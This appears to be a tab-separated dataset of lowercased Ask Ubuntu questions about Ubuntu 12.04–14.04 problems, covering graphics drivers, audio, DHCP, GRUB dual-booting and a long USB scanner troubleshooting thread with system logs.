457867	graphics drivers 14.04	i have installed the latest version of ubuntu on to a fujitsu esprimo laptop . the os has installed successfully but the graphic driver installed only has a resolution of 640x400 and is making the system unusable . how do i find suitable drivers ? any help would be most appreciated . i am a novice on linux/ubuntu .
457868	how to automatically change the volume after pulse audios starts ?	i am suffering from the problem described here and here , which unfortunately still has n't been fixed . basically after rebooting my computer my volume is at 100 % until i trigger the volume . what i mean by this is that the software volume indicator is showing the setting that was set before ( e.g . 20 % ) however the actual sound will be played at 100 % until i move the slider a bit and the system `` realises '' what the volume setting is . i am using an external dac ( which is like a usb soundcard ) which is a schiit audio . as a workaround i 'm trying to trigger the volume by adding the following command to the startup applications list ( session and startup ) as suggested here : pacmd set-sink-volume 2 20000 unfortunately this does n't seem to work , possibly because the pulse audio system is not running yet when the command is executed . i 've tried sleeping before executing it , but that does n't help either ; moreover i want to have a guarantee that the volume has been set properly so that i do n't have to live a stressful life ; ) i 've tried renaming my task so that it is at the end of the list to no avail . is there any other way for me to set the volume automatically after pulse audio loads ? i do n't want to get a heart attack every time i forget to retrigger the volume after login ... i am using xubuntu 14.04 .
457871	configuring ubuntu 14.04 as dhcp with 2 network cards	i am really confused , i installed ubuntu dhcp server 14.x and trying to get it working but do n't know where to start . i 've been reading online and there are different versions of doing it . basically , our server ( hp-proliant ) has 3 network cards ( eth0 , eth1 and loopback ) , it should be acting as dhcp for wireless access points , we have about 20 vlans and i would like to use one of them for the server and connect the cat5 to e.g . eth0 ( for internet access ) and the other network card ( eth1 ) to wireless access points ( about 50 ) . the vlan i am going to use for internet access called wi-fi with the following config : network : 10.0.19.0/24 gateway : 10.0.19.250 dhcp : 192.168.111.20 and 192.168.111.11 i would like to have the following for the second network card ( eth1 ) : network : 10.0.0.0/19 ( need at least 5000 ip addresses ) broadcast : 10.0.31.255 the clients who are connected to the access points should receive ip addresses from the ubuntu server ( range 10.0.20.x ) and not from the dhcp-server on inf0 , but the need to be able to access the internet . now my questions : how should i configure the ubuntu server ? i am really new to linux and have very little experience ( could someone please guide me exactly on this , as i found different versions online ) ? do i have to assign a static ip on eth0 ? the clients should be able to access the internet , so do i need to configure routing between both interfaces ? if yes , then how ? many thanks in advance . madona33
457872	setting pdnsd server	i installed pdnsd : it is correctly working . my problem is that it ignores the opendns server i provided in the `` server '' section of pdnsd.conf labeled `` resolvconf '' : instead of it , it uses the server which is provided by the dhcp . on the other hand , if i change the name of the server section to something else , then pdnsd correctly uses the opendns server but resolvconf put the dns provided by dhcp in resolv.conf , so pdnsd is bypassed . so , my question is : how can i have resolvconf set resolv.conf to 127.0.0.1 and pdnsd use opendns server when the request is not cached ? one workaround i found is to set , in network manager , `` dhcp ( address only ) '' for the connection , but the problem with this is that it must be set for every different connection : this means that if you use a laptop you have to change it for every wifi to which you connect !
457874	how to know if there are updates available ?	i am running a 12.04 lts ubuntu server . and i think it would be nice if i could be informed when updates are available . but i ca n't find how to know ... i have tried looking at apt-get man page . from it i was able to use apt-get -s upgrade to get the apt-get output in a script without blocking on questions . now , i clearly see the diffăšrence : updates are available : apt-get -s upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : dpkg dpkg-dev libdpkg-perl 3 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . inst dpkg [ 1.16.1.2ubuntu7.2 ] ( 1.16.1.2ubuntu7.3 ubuntu:12.04/precise-updates [ amd64 ] ) conf dpkg ( 1.16.1.2ubuntu7.3 ubuntu:12.04/precise-updates [ amd64 ] ) inst dpkg-dev [ 1.16.1.2ubuntu7.2 ] ( 1.16.1.2ubuntu7.3 ubuntu:12.04/precise-updates [ all ] ) [ ] inst libdpkg-perl [ 1.16.1.2ubuntu7.2 ] ( 1.16.1.2ubuntu7.3 ubuntu:12.04/precise-updates [ all ] ) conf libdpkg-perl ( 1.16.1.2ubuntu7.3 ubuntu:12.04/precise-updates [ all ] ) conf dpkg-dev ( 1.16.1.2ubuntu7.3 ubuntu:12.04/precise-updates [ all ] ) updates are not available : apt-get -s upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . but i do n't know how to proceed from there . how can i tell , from a bash script ( or php script ) that there are updates available or not ? edit : here is my current bash code . it does not work . updates_available=`/etc/update-motd.d/90-updates-available` if [ `` $ { updates_available } '' = `` 0 packages can be updated . 0 updates are security updates . '' ] ; then echo `` no updates are available '' else echo `` there are updates available '' fi
457875	prob with lubuntu 14 wifi ; `` time limit '' before acts up	sorry if this question has already been addressed , but i 'm not good at all with computer-speak , so all i can think to do is write out my problem in my own terms in hopes a more comprehensible ( to me ) answer becomes available . anyhow , i updated to lubuntu 14 with a fresh install , and while it generally works okay , i 'm unsure whether i want to keep it . my qualm in question is that the internet connection works funny . for the most part , it lets my laptop connect to various wi-fi points , but there seems to be a `` time limit '' before it begins acting up . after twenty or so minutes , the internet connection will slow down dramatically , and oftentimes i 'll even get booted off and totally unable to get back on , and if i do get back on , it 's at very slow speed . at first , i did n't want to deal with the frustration , so i thought to try out lubuntu 13 raring ringtail , but , as you could guess , the download -- given the file size -- rockets along for a while before it slooows down to an eventual halt , never finishing . i thought to download raring ringtail from a library computer , but the connection speed is way too slow ; it would take almost the entire allotted session . now , what could i do to address this ? now that i think of it , i recall i had this same exact problem when i began experimenting with puppy linux , and it was the internet frustration there that resulted in me flocking to lubuntu in the first place .
457876	aptana does not start on ubuntu 14.04	trying to install aptana 2.0.5 on ubuntu 14.04 but after install it is not working . i suppose i am missing something . my steps of installation : sudo apt-get install openjdk-7-jdk libjpeg62 libwebkitgtk-1.0-0 git-core sudo apt-get install libjpeg62 libwebkitgtk-1.0-0 git-core sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java7-installer downloading standalone version of aptana : sudo unzip aptana_studio_setup_linux_x86_2.0.5.zip -d /opt going by nautilus to the /opt/aptana studio/ now , i launched aptana studio , and i get this screen . for a 2-3 seconds an after that disappear and nothing is happen i spent a lot of time by trying different tutorials over the web . but nothing can help me .
457878	where are desktop enviroment texture packs found ?	on mac os there is a directory where you can put images in to replace default screens like the booting screen . is there an equivalent for desktop enviroments like gnome , unity , kde , lxde , sfce etc . ?
457880	getting hp3520e to work with ubuntu 12.04	how do i get my new hp 3520e to print from my desktop using ubuntu 12.04 ?
457882	how to set up dual graphics cards	i have a dell c1100 server and a nvidia graphics card . i have searched google and have only found how to set up dual monitors . i would like to be able to use both the integrated vga card and the nvidia card i added . how do i set something like that up ?
457884	ubuntu wo n't boot after update	i updated and upgraded ubuntu . i also installed this files/programs to prepare to install heasoft . apt-get install libreadline6-dev apt-get install libncurses5-dev apt-get install xorg-dev apt-get install gcc g++ gfortran apt-get install perl-modules apt-get install python-dev i rebooted . now it only gets a blackscreen before login . a white 'underscore ' flickered on the top left of the screen for a while but is now gone . i also tried some options in recovery mode but nothing worked . i have files on there that i need to study for a test tomorrow so any help is very much appreciated .
457890	missing jitsi tray icon after upgrading to 14.04	after upgrading ubuntu from 13.04 to 14.04 the jitsi tray icon is not visible . how do i fix it ?
457895	how to set the correct python path on ubuntu	i 'm trying to run a simple python program on ubuntu server 12.04 . however i get an import error for a module i 've written . the module folder has an init.py folder in however python does not seem to find it giving the following error user1 @ cl : ~/git/p1/test $ ls modules prog1.py user1 @ cl : ~/git/p1/test $ python prog1.py traceback ( most recent call last ) : file `` prog1.py '' , line 8 , in < module > from modules import find importerror : no module named modules from reading associated question it would appear i need to set a python path . could anyone tell me exactly what files i need to modify , i 've seen suggestions including .bashrc .bash_profile and .profile . and also what directory i need to point the path too . i 'm not totally sure if this should be my home directory or the exact folder my program is in , or the folder the module is in . sorry if this is a very basic question i 'm new to ubuntu
457896	thumbnail previewer not working for large images	i have over 500 images downloaded from shutterstock so they are very large images , some over 10mb . ubuntu will not show the thumbnail for anything above that file size . is this a compiz settings issue or unity tweak , or something else ?
457897	boot xp from secondary hdd using grub2 on primary hdd	i have a computer with one hdd that has ubuntu 14.04 as the only os and grub2 on the same disk ( hd0/sata0 ) . its partitions are : sda1 - ext4 primary sda2 - swap area sda3 - ntfs i found an old hdd that has xp installed on it as the primary ( and only ) os . i attached it to my computer ( sata1 ) and it is recognized by the grub2 as hd1 . my goal is to load the xp os ( without changing the bios boot order or reinstalling xp ) via the grub2 command line/configuration files . i entered the grub2 command line and tried the following commands : set root= ' ( hd1 , msdos1 ) ' drivemap -s hd0 hd1 chainloader +1 this solution did n't work . it said that the command drivemap does n't exist and the command chainloader asked for an input file . how can i boot windows xp ( not efi ) using the grub2 on another hdd ?
457898	ubuntu error system in low graphics	i updated the nvidia driver and now i get an error : `` system is running in low graphic mode '' . i have tried googling and the solutions i found dont work . i have ubuntu 12.04 and nvidia gefoce with vuda
457901	usb 2.0 device ( scanner ) does not work with xhci_hcd on usb 3.0 system	i 'm trying to scan with samsung scx-4200 which is a printer with scanner . when i connect my brother 's laptop which has the same version of ubuntu ( 14.04 ) , it works . i do n't know how and why . he did not install any software for scanning . i also tried another computer with elementary os , and it too works . now here 's when it gets really weird ! i tried running many distributions form live usb on both mine and brother 's laptop . scanner always works with brother 's and never with mine laptop . i need scanner a lot and it might happen that , because of this , i might switch to windows , which i do n't like because it 's not open-source , so please help ! here are the screenshots of the error i 'm getting and the settings of simple scan . edit1 : the usb works fine with any other device . so far , i have connected mouse , usb flash memory , camera , and they all work fine . i have tried to connect scanner to all 3 usb ports ( 2 3.0 and 1 2.0 ) and the same thing happens . edit2 : scanning works with the program vuescan , but it requires to buy it in order to remove watermark which it creates , and it 's closed source . edit3 : of all tested laptops , only mine has usbs 3.0 ( x2 ) . however , scan does n't work on usb 2.0 too ( on my laptop ) . edit4 : here 's output of sudo sane-find-scanner : # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . # no usb scanners found . if you expected something different , make sure that # you have loaded a kernel driver for your usb host controller and have setup # the usb system correctly . see man sane-usb for details . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . edit5 : i tried all combinations of settings in bios related to usb configuration , without result . i reverted back to the original settings . edit6 : i tried scanlite , here 's the error it gives me : edit7 : the second time i ran scanlite , it says it dod not detect scanners on my computer . i sometimes get simillar message on simple scan . edit8 : the scanner works with simple scan after doing the following : open system settings clicking printers right click on my printer ( scx-4200 ) - > properties ink/toner levels clicking refresh opening simple scan clicking scan waiting about 10-20 seconds till the error message shows up ( like on screenshot provided ) clicking scan again and that 's for 1 scan only . edit9 : me and my brother both have 64 bit . my brother 's laptop is hp , and mine is asus . mine has more options in bios . i have 2 usb 3.0 and one 2.0 , while my brother has 3 x 2.0 . that are some diferences ... here 's output of uname -a for mine laptop : linux dusan-k55a 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux and here 's my brother 's : linux milki-hp-2000-notebook-pc 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux edit10 : my laptop was fresh install , brother 's was upgraded . the same thing happened when the both laptops were running fresh install 13.10 edit11 : here 's my output of lsmod : module size used by ctr 13049 2 ccm 17773 2 pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 27613 0 vboxdrv 339502 3 vboxnetadp , vboxnetflt , vboxpci rfcomm 69160 12 bnep 19624 2 binfmt_misc 17468 1 nls_iso8859_1 12713 1 snd_hda_codec_hdmi 46207 1 snd_hda_codec_realtek 61438 1 joydev 17381 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core snd_hda_intel 52355 3 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec ath3k 13318 0 snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel btusb 32412 0 bluetooth 395423 23 bnep , ath3k , btusb , rfcomm snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi asus_nb_wmi 16990 0 asus_wmi 24191 1 asus_nb_wmi sparse_keymap 13948 1 asus_wmi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 snd 69238 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi dm_multipath 22873 0 kvm 451511 1 kvm_intel arc4 12608 2 csi_dh 14882 1 dm_multipath crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 aesni_intel 55624 4 ath9k 164164 0 ath9k_common 13551 1 ath9k aes_x86_64 17131 1 aesni_intel ath9k_hw 453856 2 ath9k_common , ath9k lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper ath 28698 3 ath9k_common , ath9k , ath9k_hw mac80211 626489 1 ath9k rtsx_pci_ms 18151 0 psmouse 102222 0 serio_raw 13462 0 cfg80211 484040 3 ath , ath9k , mac80211 memstick 16966 1 rtsx_pci_ms lpc_ich 21080 0 soundcore 12680 1 snd i915 783485 4 wmi 19177 1 asus_wmi mac_hid 13205 0 drm_kms_helper 52758 1 i915 drm 302817 5 i915 , drm_kms_helper mei_me 18627 0 mei 82274 1 mei_me video 19476 2 i915 , asus_wmi i2c_algo_bit 13413 1 i915 parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 52616 0 hid 106148 2 hid_generic , usbhid rtsx_pci_sdmmc 23274 0 ahci 25819 3 libahci 32168 1 ahci r8169 67581 0 rtsx_pci 45956 2 rtsx_pci_ms , rtsx_pci_sdmmc mii 13934 1 r8169 dm_mirror 22135 0 dm_region_hash 20862 1 dm_mirror dm_log 18411 2 dm_region_hash , dm_mirror and here 's my brother 's : module size used by ctr 13049 1 ccm 17773 1 joydev 17381 0 snd_hda_codec_hdmi 46207 1 snd_hda_codec_realtek 61438 1 hp_wmi 14062 0 sparse_keymap 13948 1 hp_wmi uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core bnep 19624 2 rfcomm 69160 12 intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm 451511 0 crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 cryptd 20359 1 ghash_clmulni_intel snd_hda_intel 52355 5 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec arc4 12608 2 snd_pcm 102099 4 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel psmouse 102222 0 serio_raw 13462 0 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel ath9k 164164 0 ath9k_common 13551 1 ath9k ath3k 13318 0 ath9k_hw 453856 2 ath9k_common , ath9k rtsx_pci_ms 18151 0 btusb 32412 0 bluetooth 395423 23 bnep , ath3k , btusb , rfcomm ath 28698 3 ath9k_common , ath9k , ath9k_hw memstick 16966 1 rtsx_pci_ms lpc_ich 21080 0 snd_seq_midi 13324 0 mac80211 626489 1 ath9k binfmt_misc 17468 1 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi cfg80211 484040 3 ath , ath9k , mac80211 wmi 19177 1 hp_wmi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi nls_iso8859_1 12713 1 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq mac_hid 13205 0 snd 69238 20 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi i915 783485 5 soundcore 12680 1 snd video 19476 1 i915 mei_me 18627 0 mei 82274 1 mei_me drm_kms_helper 52758 1 i915 drm 302817 6 i915 , drm_kms_helper i2c_algo_bit 13413 1 i915 parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 52616 0 hid 106148 2 hid_generic , usbhid rtsx_pci_sdmmc 23274 0 ahci 25819 3 r8169 67581 0 libahci 32168 1 ahci mii 13934 1 r8169 rtsx_pci 45956 2 rtsx_pci_ms , rtsx_pci_sdmmc edit12 : the owner of /dev/bus/usb/* is root . here 's an output of lusb : bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 04f2 : b354 chicony electronics co. , ltd bus 001 device 005 : id 13d3:3362 imc networks bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 04e8:341b samsung electronics co. , ltd scx-4200 series bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub it finds printer ( scx4200 ) , so i guess it 's a scanner too , since it 's printer and scaner ( multifunction printer ) . here 's some latest part of /var/log/syslog '' may 6 19:47:07 dusan-k55a networkmanager [ 1050 ] : < info > activation ( wlan0 ) successful , device activated . may 6 19:47:07 dusan-k55a whoopsie [ 1317 ] : message repeated 6 times : [ offline ] may 6 19:47:08 dusan-k55a whoopsie [ 1317 ] : online may 6 19:47:08 dusan-k55a signond [ 6522 ] : ../../../../src/signond/signondaemon.cpp 388 init failed to suid root . secure storage will not be available . may 6 19:47:13 dusan-k55a ntpdate [ 6489 ] : adjust time server 91.189.94.4 offset 0.251812 sec may 6 19:47:23 dusan-k55a kernel : [ 249.508157 ] usb 3-3 : new high-speed usb device number 3 using xhci_hcd may 6 19:47:23 dusan-k55a kernel : [ 249.525822 ] usb 3-3 : new usb device found , idvendor=04e8 , idproduct=341b may 6 19:47:23 dusan-k55a kernel : [ 249.525830 ] usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 may 6 19:47:23 dusan-k55a kernel : [ 249.525834 ] usb 3-3 : product : scx-4200 series may 6 19:47:23 dusan-k55a kernel : [ 249.525837 ] usb 3-3 : manufacturer : samsung may 6 19:47:23 dusan-k55a kernel : [ 249.525840 ] usb 3-3 : serialnumber : 8t21bailc00139n . may 6 19:47:23 dusan-k55a kernel : [ 250.127578 ] warning ! power/level is deprecated ; use power/control instead may 6 19:47:23 dusan-k55a colord : device added : sysfs-samsung-scx-4200_series may 6 19:47:23 dusan-k55a kernel : [ 250.206346 ] usblp 3-3:1.1 : usblp0 : usb bidirectional printer dev 3 if 1 alt 0 proto 2 vid 0x04e8 pid 0x341b may 6 19:47:23 dusan-k55a kernel : [ 250.206372 ] usbcore : registered new interface driver usblp may 6 19:47:24 dusan-k55a networkmanager [ 1050 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . may 6 19:47:24 dusan-k55a networkmanager [ 1050 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... may 6 19:47:24 dusan-k55a networkmanager [ 1050 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... may 6 19:47:24 dusan-k55a networkmanager [ 1050 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . may 6 19:47:25 dusan-k55a wpa_supplicant [ 1293 ] : wlan0 : ctrl-event-scan-started may 6 19:47:28 dusan-k55a networkmanager [ 1050 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted may 6 19:47:41 dusan-k55a signond [ 6522 ] : qobject : :disconnect : unexpected null parameter may 6 19:49:27 dusan-k55a dbus [ 916 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) may 6 19:49:27 dusan-k55a dbus [ 916 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' may 6 19:51:57 dusan-k55a kernel : [ 523.891783 ] usb 3-3 : usbfs : interface 1 claimed by usblp while 'scan-thread ' sets config # 1 may 6 19:50:34 dusan-k55a wpa_supplicant [ 1293 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] may 6 19:52:02 dusan-k55a wpa_supplicant [ 1293 ] : wlan0 : wpa : group rekeying completed with 7c:05:07 : de:42:7a [ gtk=tkip ] may 6 19:52:17 dusan-k55a wpa_supplicant [ 1293 ] : wlan0 : ctrl-event-scan-started may 6 19:53:24 dusan-k55a kernel : [ 610.927164 ] usb 3-3 : usbfs : interface 1 claimed by usblp while 'scan-thread ' sets config # 1 and here 's some latest output from /var/log/kern.log , here it shows some kind of driver interference : may 6 19:47:04 dusan-k55a kernel : [ 230.535670 ] ath9k 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap may 6 19:47:04 dusan-k55a kernel : [ 230.535672 ] ath9k 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap may 6 19:47:04 dusan-k55a kernel : [ 230.537083 ] wlan0 : associate with 7c:05:07 : de:42:7a ( try 1/3 ) may 6 19:47:04 dusan-k55a kernel : [ 230.541459 ] wlan0 : rx assocresp from 7c:05:07 : de:42:7a ( capab=0x411 status=0 aid=1 ) may 6 19:47:04 dusan-k55a kernel : [ 230.541663 ] wlan0 : associated may 6 19:47:23 dusan-k55a kernel : [ 249.508157 ] usb 3-3 : new high-speed usb device number 3 using xhci_hcd may 6 19:47:23 dusan-k55a kernel : [ 249.525822 ] usb 3-3 : new usb device found , idvendor=04e8 , idproduct=341b may 6 19:47:23 dusan-k55a kernel : [ 249.525830 ] usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 may 6 19:47:23 dusan-k55a kernel : [ 249.525834 ] usb 3-3 : product : scx-4200 series may 6 19:47:23 dusan-k55a kernel : [ 249.525837 ] usb 3-3 : manufacturer : samsung may 6 19:47:23 dusan-k55a kernel : [ 249.525840 ] usb 3-3 : serialnumber : 8t21bailc00139n . may 6 19:47:23 dusan-k55a kernel : [ 250.127578 ] warning ! power/level is deprecated ; use power/control instead may 6 19:47:23 dusan-k55a kernel : [ 250.206346 ] usblp 3-3:1.1 : usblp0 : usb bidirectional printer dev 3 if 1 alt 0 proto 2 vid 0x04e8 pid 0x341b may 6 19:47:23 dusan-k55a kernel : [ 250.206372 ] usbcore : registered new interface driver usblp may 6 19:51:57 dusan-k55a kernel : [ 523.891783 ] usb 3-3 : usbfs : interface 1 claimed by usblp while 'scan-thread ' sets config # 1 may 6 19:53:24 dusan-k55a kernel : [ 610.927164 ] usb 3-3 : usbfs : interface 1 claimed by usblp while 'scan-thread ' sets config # 1 in ~/.xsession-errors there 's no errors , i think : script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd respawning too fast , stopped edit13 : by analising errors in /var/log/kern.log , i have found out that this error line is outputed into kern.log when i get error no scanner found : may 6 20:45:34 dusan-k55a kernel : [ 500.209280 ] usb 3-3 : usbfs : interface 1 claimed by usblp while 'scan-thread ' sets config # 1 and i get this error when `` failed to scan '' error heppens ( like in screenshot ) : may 6 20:52:03 dusan-k55a kernel : [ 889.843120 ] usb 3-3 : usbfs : interface 1 claimed by usblp while 'scan-thread ' sets config # 1 edit14 : i realized that with samsung universal linux driver , which i have installed via this link , printing does n't work . i uninstalled it and installed drivers via add printer function in system settings - > printers . however , now scanning does n't work even with steps in edit8 , which previously worked , but now , printing works . ahowever , scanning with vuescan still works . edit15 : here 's output of grep 341b /etc/sane.d/xerox_mfp.conf : usb 0x04e8 0x341b and output of modprobe -r usblp ; sane-find-scanner : # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . # no usb scanners found . if you expected something different , make sure that # you have loaded a kernel driver for your usb host controller and have setup # the usb system correctly . see man sane-usb for details . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . here 's output of ldd $ ( which sane-find-scanner ) : linux-vdso.so.1 = > ( 0x00007fffad7e6000 ) libusb-1.0.so.0 = > /lib/x86_64-linux-gnu/libusb-1.0.so.0 ( 0x00007f872a0b6000 ) libieee1284.so.3 = > /usr/lib/x86_64-linux-gnu/libieee1284.so.3 ( 0x00007f8729eaa000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f8729ae3000 ) libudev.so.1 = > /lib/x86_64-linux-gnu/libudev.so.1 ( 0x00007f87298d2000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f87296b4000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f872a2f4000 ) libcgmanager.so.0 = > /lib/x86_64-linux-gnu/libcgmanager.so.0 ( 0x00007f8729499000 ) libnih.so.1 = > /lib/x86_64-linux-gnu/libnih.so.1 ( 0x00007f8729281000 ) libnih-dbus.so.1 = > /lib/x86_64-linux-gnu/libnih-dbus.so.1 ( 0x00007f8729077000 ) libdbus-1.so.3 = > /lib/x86_64-linux-gnu/libdbus-1.so.3 ( 0x00007f8728e31000 ) librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007f8728c29000 ) edit16 : here 's dll.conf . edit17 : here 's log.txt , the output of sudo strace sane-find-scanner . edit18 : here 's output of scanimage -l , it 's same for mine and my brother 's laptop : device `xerox_mfp : libusb:003:003 ' is a samsung orion multi-function peripheral
457906	wireless and ethernet networks unclaimed	i closed my laptop last night , and when it resumed this morning it disconnected from the internet . i have ubuntu 13.10 and i 've never had a problem like this . i 'm new to this os so i have n't used the terminal until today really . i 've no idea what to do or where to start ... help ! sudo lshw - c network *-network unclaimed description : network controller product : ar9285 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock:33 mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency =0 resources : memory : dfd00000-dfd0ffff *-network unclaimed description : ethernet controller product : ar8152 v2.0 fast ethernet controller vendor : qualcomm atheros physical i'd:0 bus info : pci @ 0000:03.00.0 version : ci width:61 bits clock : 33mhz capabilities : on msi pciexpress vps bus_master cap_list configuration : latency=0 resources : memory : dfc00009-dfc3ffff ioport : e000 ( size=128 )
457907	adding an external hard-drive to www folder	i have built a basic web server , and everything works fine . i have a external hard drive which i would like to add to my /var/www folder . how should i do this ?
457910	strange noise in headphones when no sound is played	there is a strange noise coming out of my headphones on my lenovo t440 . the sound is like when you tune your radio , but you get a wrong frequency and you hear unpleasant noise . well - that 's the same noise . the noise starts at when ubuntu 14.04 boots up and ends after a shutdown . the noise is coming out only trough my headphones , there is no noise trough speakers . the strange thing is the noise disappears when any sound is played or if i enter sound preferences . but when a sound is stopped , it appears again after 10 seconds or less . the other thing that the noise goes way down ( or maybe even disappears ) if i put in my laptop charger and stop the music . also , no matter how i change my volume level , the noise level is the same . it seems like the output is not disabled after sound stop . i have found a lot of similar threats , but no solution yet . sudo aplay -l **** list of playback hardware devices **** card 0 : hdmi [ hda intel hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc292 analog [ alc292 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0
457914	cant install ubuntu from usb	here i am with freshly made ubuntu usb installer ready to boot . i need to boot it because this ubuntu does not boot , start - could not write bytes broken pipe made me kill my hamster . anyway since i have given up on fixing my pc , i have decided to reinstall completely ubuntu . i put inside my usb press f12 during startup to enter bios - there i press boot from usb another ubuntu screen with a small stick figure pops up and usb next to it , i have to press enter otherwise it leads to the restart and again broken pipe thing , it follows up with choosing language pops up , so i choose it and then these options of installation try ubuntu without installation check memory install ubuntu check disk start of system from first disk ( this just repeats the whole process since usb is there as first and only ) rest of the choices lead to restart of the pc and ... again broken pipe , could not write bytes - screen . so ... .how do i get rid of it ?
